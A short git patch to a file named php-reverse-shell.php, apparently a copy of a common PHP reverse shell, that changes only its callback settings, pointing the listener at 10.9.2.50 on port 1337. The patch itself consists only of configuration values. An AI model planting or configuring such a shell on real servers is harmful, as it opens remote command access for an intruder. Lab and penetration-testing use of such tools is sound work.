From f4fb8e4ea1b3dccc2ec71c450fc40985253459e2 Mon Sep 17 00:00:00 2001 From: Raj007755 <94738333+Raj007755@users.noreply.github.com> Date: Tue, 23 Nov 2021 11:31:39 +0530 Subject: [PATCH] Update php-reverse-shell.php --- php-reverse-shell.php | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 2503b71..34390b9 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,8 +46,8 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = '127.0.0.1'; // CHANGE THIS -$port = 1234; // CHANGE THIS +$ip = '10.9.2.50'; // CHANGE THIS +$port = 1337; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null;